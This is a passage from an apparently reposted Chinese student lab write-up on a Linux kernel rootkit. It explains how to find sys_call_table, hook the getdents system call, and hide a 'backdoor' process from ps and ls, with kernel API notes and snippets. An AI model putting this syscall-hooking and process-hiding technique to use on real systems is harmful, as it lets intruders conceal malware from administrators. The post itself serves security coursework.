...for (index = 0; index <= PAGE_SIZE; index += 1) {    u8 *arr = (u8 *)lstar + index;    if (arr[0] == 0xff && arr[1] == 0x14 && arr[2] == 0xc5) {        return arr + 3;    }}...

PAGE_SIZE 在好多地方都有定义,我也不清楚具体引用的是哪一个,在 arch/arc/include/uapi/asm/page.h 中定义如下:

#define PAGE_SIZE _BITUL(PAGE_SHIFT)        /* Default 8K */

17 rdmsrl() 函数的作用是什么?

u64 lstar;rdmsrl(MSR_LSTAR, lstar);// 将寄存器 MSR_LSTAR 中的内容读到 lstar 中

18 loff_t 的定义

在 include/linux/types.h 中定义如下,参考:

#if defined(__GNUC__)typedef __kernel_loff_t loff_t;#endif

__kernel_loff_t 在 include/uapi/asm-generic/posix_types.h 中定义如下:

typedef long long __kernel_loff_t;

19 filp_open()函数,O_RDONLY,vsf_read(fp, buf1, 64, &pos)

在 include/linux/fs.h 中定义如下,参考:

extern struct file *filp_open(const char *, int, umode_t);

umod_t 在 include/linux/types.h 中定义如下,参考:

typedef unsigned short umode_t;

O_RDONLY 在 include/uapi/asm-generic/fcntl.h 中声明如下,参考:

#define O_ACCMODE   00000003#define O_RDONLY    00000000#define O_WRONLY    00000001#define O_RDWR      00000002

strcut file* filp_open(const char* filename, int open_mode, int mode);

该函数返回strcut file*结构指针,供后继函数操作使用,该返回值用IS_ERR()来检验其有效性;

  • filename:表明要打开或创建文件的名称(包括路径部分)。在内核中打开的文件时需要注意打开的时机,很容易出现需要打开文件的驱动很早就加载并打开文件,但需要打开的文件所在设备还没有挂载到文件系统中,而导致打开失败;
  • open_mode:文件的打开方式,其取值与标准库中的open相应参数类似,可以取O_CREAT,O_RDWR,O_RDONLY等;
  • mode:创建文件时使用,设置创建文件的读写权限,其它情况可以匆略设为0;

kernel中文件的读写操作可以使用vfs_read()和vfs_write,vfs_read() vfs_write()两函数的原形如下:

ssize_t vfs_read(struct file* filp, char __user* buffer, size_t len, loff_t* pos);
ssize_t vfs_write(struct file* filp, const char __user* buffer, size_t len, loff_t* pos);
1)注意这两个函数的第2个参数buffer,前面都有__user修饰符,这就要求这两个buffer指针都应该指向用户空间的内存,如果对该参数传递kernel空间的指针,这两个函数都会返回失败-EFAULT。但在Kernel中,我们一般不容易生成用户空间的指针,或者不方便独立使用用户空间内存。
2)要使这两个读写函数使用kernel空间的buffer指针也能正确工作,需要使用set_fs()函数或宏(set_fs()可能是宏定义),如果为函数,其原形如:void set_fs(mm_segment_t fs); 该函数的作用是改变kernel对内存地址检查的处理方式,其实该函数的参数fs只有两个取值:USER_DS,KERNEL_DS,分别代表用户空间和内核空间,默认情况下,kernel取值为USER_DS,即对用户空间地址检查并做变换。那么要在这种对内存地址做检查变换的函数中使用内核空间地址,就需要使用set_fs(KERNEL_DS)进行设置。get_fs()一般也可能是宏定义,它的作用是取得当前的设置,这两个函数的一般用法为:

mm_segment_t old_fs;old_fs = get_fs();set_fs(KERNEL_DS);...... //与内存有关的操作set_fs(old_fs);

还有一些其它的内核函数也有用__user修饰的参数,在kernel中需要用kernel空间的内存代替时,都可以使用类似办法。使用vfs_read()和vfs_write()最后需要注意的一点是最后的参数loff_t * pos,pos所指向的值要初始化,表明从文件的什么地方开始读写。

int filp_close(struct file*filp, fl_owner_t id);

该函数的使用很简单,第二个参数一般传递NULL值,也有用current->files作为实参的;

参考:

  • Linux内核中读写文件数据的方法:
  • linux内核态文件操作filp_open/filp_close/vfs_read/vfs_write:

20 mm_segment_t 的含义,get_fs() 什么意思?set_fs(KERNEL_DS),set_fs(fs) 什么意思?

在 arch/avr32/include/asm/uaccess.h 中定义如下:

1 typedef struct { 2     unsigned int is_user_space; 3 } mm_segment_t; 4  5 /* 6 * The fs value determines whether argument validity checking should be 7 * performed or not.  If get_fs() == USER_DS, checking is performed, with 8 * get_fs() == KERNEL_DS, checking is bypassed. 9 *10 * For historical reasons (Data Segment Register?), these macros are misnamed.11 */12 #define MAKE_MM_SEG(s)  ((mm_segment_t) { (s) })13 #define segment_eq(a, b)    ((a).is_user_space == (b).is_user_space)14 15 #define USER_ADDR_LIMIT 0x8000000016 17 #define KERNEL_DS   MAKE_MM_SEG(0)18 #define USER_DS     MAKE_MM_SEG(1)19 20 #define get_ds()    (KERNEL_DS)21 22 static inline mm_segment_t get_fs(void)23 {24     return MAKE_MM_SEG(test_thread_flag(TIF_USERSPACE));25 }26 27 static inline void set_fs(mm_segment_t s)28 {29     if (s.is_user_space)30         set_thread_flag(TIF_USERSPACE);31     else32         clear_thread_flag(TIF_USERSPACE);33 }
View Code

1)fs值决定是否应该进行参数有效性检查执行与否。如果get_fs() == USER_DS,则执行检测,若get_fs() == KERNEL_DS,则检查被绕过。

2)系统调用的参数要求必须来自用户空间,所以,当在内核中使用系统调用的时候,set_fs(get_ds())改变了用户空间的限制,即扩大了用户空间范围,因此即可使用在内核中的参数了。
3)系统调用本来是提供给用户空间的程序访问的,所以对传递给它的参数(比如上面的buf),它默认会认为来自用户空间,在->write()函数中, 为了保护内核空间,一般会用get_fs()得到的值来和USER_DS进行比较,从而防止用户空间程序“蓄意”破坏内核空间;
4)而现在要在内核空间使用系统调用,此时传递给->write()的参数地址就是内核空间的地址了,在USER_DS之上(USER_DS ~ KERNEL_DS),如果不做任何其它处理,在write()函数中,会认为该地址超过了USER_DS范围,所以会认为是用户空间的“蓄意破坏”,从而不允许进一步的执行。

参考:

21 memmove()和memcpy()有什么区别?

1)memmove():

#include 
void *memmove(void *dest, const void *src, size_t n);The memmove() function copies n bytes from memory area src to memory area dest. The memory areas may overlap: copying takes place as though the bytes in src are first copied into a temporary array that does not overlap src or dest, and the bytes are then copied from the temporary array to dest.

2)memcpy():

#include 
void *memcpy(void *dest, const void *src, size_t n);The memcpy() function copies n bytes from memory area src to memory area dest. The memory areas must not overlap. Use memmove(3) if the memory areas do overlap.

22 dup()、dup2()函数

dup 和 dup2 都可以用来复制一个现存的文件描述符。经常用来重新定向进程的 STDIN,STDOUT,STDERR。定义在 <unistd.h>中;

1)int dup(int filedes) ;
函数返回一个新的描述符,这个新的描述符是传给它的描述符的拷贝,若出错则返回 -1。由dup返回的新文件描述符一定是当前可用文件描述符中的最小数值。这函数返回的新文件描述符与参数 filedes 共享同一个文件数据结构。
2)int dup2(int filedes, int filedes2);
同样,函数返回一个新的文件描述符,若出错则返回 -1。与 dup 不同的是,dup2 可以用 filedes2 参数指定新描述符的数值。如果 filedes2 已经打开,则先将其关闭。如若 filedes 等于 filedes2 , 则 dup2 返回 filedes2 , 而不关闭它。同样,返回的新文件描述符与参数 filedes 共享同一个文件数据结构。
参考:linux之dup和dup2函数解析:

23 为什么最后修改的是系统调用 sys_call_table[__NR_getdents]?

Linux 系统调用表中,getdents 的含义:读取目录项

在 arch/alpha/include/uapi/asm/unistd.h 中,__NR_getdents 定义如下,参考:

#define __NR_getdents 305

查看 ls 命令源码,发现其内部是调用了 readdir 函数,而 readdir 是 glibc 的封装函数,glibc 内部调用的是 getdents 系统调用;

下面是 ls 源码的一部分:

1 while( (direntp = readdir(dir)) != NULL) 2 { 3     if(-1 == stat(direntp->d_name,&st)) 4         continue; 5     if((!(flags & STAT_ALL_INFO)) && (direntp->d_name[0] == '.') ) 6         continue; 7     AddnNode(head,direntp->d_name,&st); 8     if(S_ISDIR(st.st_mode) && (flags&STAT_RECUR) && strcmp(".",direntp->d_name)&&strcmp( direntp->d_name,"..")) 9     {10         nNode *newhead=NULL;11         do_ls(direntp->d_name,flags,&newhead);12         printf("%s :\n",direntp->d_name);13         showfile(newhead,flags);14         freeNode(newhead);15     }16 }
View Code

同样,查看 ps 命令源码,发现其内部也是调用了 glibc 的封装函数 readdir,内部调用的也是 getdents 系统调用;

下面是 ps 源码的一部分:

1 while((de = readdir(d)) != 0){2     if(isdigit(de->d_name[0])){3         int tid = atoi(de->d_name);4         if(tid == pid) continue;5         ps_line(pid, tid, namefilter);6     }7 }
View Code

所以在设置劫持函数时,直接替换 sys_call_table[__NR_getdents];

参考:

  • Simon / linux的ls源代码:
  • linux命令之ps源码,支持linux和android:
  • Linux系统调用列表:
  • readdir函数解析:

24 下面各个头文件的作用

#include <linux/module.h>

#include <linux/kernel.h>
#include <linux/uaccess.h>

  • copy_from_user()
  • copy_to_user()
  • get_fs()
  • set_fs()

#include <linux/slab.h>

  • kfree()
  • kmalloc()

#include <linux/fs.h>

  • filp_open()
  • filp_close()
  • vfs_read()

#include <linux/string.h>

  • strstr()

六 18.04的坑

我以为我一直会很幸运,直到我遇到了实验3。在18.04上花了1天时间没把SCT地址搞出来,内外查了不少资料,还是没磕出来。由于时间比较紧,就没继续躺坑了,因为总感觉这个坑 它又大又圆又深。老老实实装了16.04.3的系统,按照那位学长的博客开始DIY。参考资料部分有一些我查过的资料,具体对应哪些问题我笔记上也没记录,所以大家要参考可能要费点时间(sorry~(┬_┬))

来看看这个又大又圆的坑,几乎同样的代码(改了个静态地址而已),在18.04、16.04.3 上run的结果不一样,所以那位学长博客中的代码在18.04系统下是用不了的。测试代码如下:

1 #include 
2 #include
3 #include
4 5 static unsigned long **sys_call_table; 6 7 static int filter_init(void) { 8 printk("fitler_init\n"); 9 sys_call_table = (void *)0xffffffff81a00240; // Ubuntu 16.04.3 Kernel 4.10.0-28-generic10 sys_call_table = (void *)0xffffffff81e001e0; // Ubuntu 18.04.2 Kernel 4.18.0-17-generic11 if (sys_call_table) {12 printk("sys_call_table = %p\n", sys_call_table);13 }14 return 0;15 }16 17 static void filter_exit(void) {18 printk("fitler_exit\n");19 }20 21 MODULE_LICENSE("GPL");22 module_init(filter_init);23 module_exit(filter_exit);
View Code

在 Ubuntu 18.04.2 Kernel 4.18.0-17-generic 上run:

在 Ubuntu 16.04.3 Kernel 4.10.0-28-generic 上run:

我先用命令:sudo cat /boot/System.map-4.10.0-28-generic | grep sys_call_table 拿到SCT的地址(18.04对应System.map-4.18.0-17-generic),然后硬编码到测试代码中,发现在16.04.3下可以正确输出SCT地址,而在18.04下输出的是个?(鬼)。鬼知道 4.8.0-17 内核在内部动了什么手脚,加了层保护?what ever, good luck

七 参考资料

参考链接我已经在文章中的相关位置贴过了,这里只是汇总的贴一遍(可能会有遗漏),链接中也包括躺18.04的坑时查的资料(我给忘了是哪几个链接)。

  • Linux Rootkit 系列六:基于修改派遣例程的系统调用挂钩:
  • 信息安全课程13:rootkit(1):
  • 信息安全课程14:rootkit(2):
  • LibZeroEvil & the Research Rootkit project. :
  • Linux Rootkit 系列二:基于修改 sys_call_table 的系统调用挂钩 :
  • Rootkit-LKM编程劫持系统调用,隐藏后门程序backdoor(ps,ls):
  • Where do you find the syscall table for Linux?:
  • Linux Rootkit 实验 | 0001 基于修改sys_call_table的系统调用挂钩:
  • rootkit:实现隐藏进程(32位):
  • 关于内核系统调用的hooks问题:
  • How to write a rootkit without really trying:
  • Syscall hijacking in 2019:
  • Old Ubuntu Releases:
  • Ubuntu Kernel Support and Schedules:

Stackoverflow:

  • Finding the sys call table in memory 64-bit on 4.x.x Kernel:
  • Syscall hijacking from kernel:
  • LKM linux_dirent implementation:
  • Invalid system call interception in Linux kernel:

八 老师可能的提问

1 ps读的是哪个目录下的文件?

/proc/

2 这个number是指什么?什么的长度?

if ((number = (*orig_getdents)(fd, dirp, count)) == 0)    return 0;

   我:指的是读取到的<dirent>的长度,单位是字节;

老师:是哪个地方的<dirent>?
   我:是参数中文件描述符 fd 指向的文件的<dirent>;
老师:那在现在这个场景下,读的是哪个目录下的<dirent>呢?
   我:是/proc/目录下的;
老师:OK;

3 根据你的实现,来模拟这样一个场景:

1)运行backdoor程序,获取其PID,这里假设为2054;
2)在任意一个目录下创建一个文件/文件夹,命名为:2054;
3)运行ls命令,看是否能看到这个文件/文件夹;
答案:看不到(注意,是基于我上面提供的代码来回答的);
因为:

  • ls 和 ps 底层都是调用了系统调用 sys_call_table[__NR_getdents],而我们代码中劫持了这个系统调用,所以 ls 命令产生的结果也会被我们劫持;
  • 当我们在判断一个<dirent>是否需要过滤时,会递进地判断以下条件:
    • 1)need_filter(char *d_name),传进来的 d_name 是不是一个PID(即:一串整型数字),如果是的话返回PID的长度,不是的话返回-1,这一步操作在 get_pid_len(char *d_name) 方法中完成;
    • 2)通过(1)的判断后(pidlen > 0),开始申请所需的空间,若申请失败,直接跳到out,即:不处理当前<dirent>;
    • 3)若空间申请成功,则会从构造的文件路径:/proc/2054/status 中读取文件,并从文件中第一行匹配关键字“backdoor”,若成功匹配,则说明当前<dirent>需要过滤,否则不需要过滤;
  • 现在我们在随便一个目录下创建了文件,名为:2054,走一遍 need_filter(char *d_name) 的流程:
    • 1)ls 命令产生的 d_name 是文件名,所以现在 d_name = "2054",在调用 get_pid_len(char *d_name) 方法时,被误判为这是 ps 命令产生的<dirent>,因为传进来的 d_name 就是一串整型字符(2054),所以会通过检测,进入到(2)的判断;
    • 2)申请内存空间不和特定命令挂钩,并且通常会分配成功,所以进入判断(3);
    • 3)因为此前已经运行了 backdoor 程序,所以 /proc/2054/status 这个文件是一定存在的;现在根据 ls 命令产生的 d_name 构造出的文件路径同样是:/proc/2054/status,程序去读取这个文件时,发现文件存在,并且从其第一行中匹配到了关键字“backdoor”,所以当前<dirent>需要过滤;
  • 这样一来,运行 ls 命令,是看不到你创建的名为“2054”的文件的,如果这是个文件夹,那么这个文件夹本身你看不到,但是你可以用 cd 命令进入这个文件夹,然后在里面创建1.txt,此时在该目录下执行 ls 命令,是可以看到 1.txt文件的;

测试效果图:

1)ps 查看到 backdoor 进程

2)创建了一个文件,文件名即为:backdoor的PID,2423

3)执行 > sudo insmod lcx-pshider.ko 后:

  • 执行 ps 命令,看不到 backdoor进程;
  • 执行 ls 命令,看不到 2423 文件;
  • 执行 cat 2423 却可以将 2423 文件的内入打印出来;

4)在当前目录下创建了目录:proc/2423,发现在./proc/目录下执行 ls 命令,看不到 2423 这个目录,但是可以通过 cd 命令进入该目录;

5)同样的,在/proc/目录下也找不到 2423 这个进程的目录:

转载请说明出处? have a good time ~

转载于:https://www.cnblogs.com/southday/p/11013166.html

你可能感兴趣的文章
display:none和visiblity:hidden区别
查看>>
C#double转化成字符串 保留小数位数, 不以科学计数法的形式出现。
查看>>
牛的障碍Cow Steeplechase
查看>>
Zookeeper选举算法原理
查看>>
3月29日AM
查看>>
利用IP地址查询接口来查询IP归属地
查看>>
HTML元素定义 ID,Class,Style的优先级
查看>>
构造者模式
查看>>
http和https的区别
查看>>
Hbuild在线云ios打包失败,提示BuildConfigure Failed 31013 App Store 图标 未找到 解决方法...
查看>>
找到树中指定id的所有父节点
查看>>
今天新开通了博客
查看>>
AS3优化性能笔记二
查看>>
ElasticSearch(站内搜索)
查看>>
4----COM:a Generative Model for group recommendation(组推荐的一种生成模型)
查看>>
UVA 11137 - Ingenuous Cubrency
查看>>
js阻止事件冒泡的两种方法
查看>>
Java异常抛出
查看>>
74HC164应用
查看>>
变量声明和定义的关系
查看>>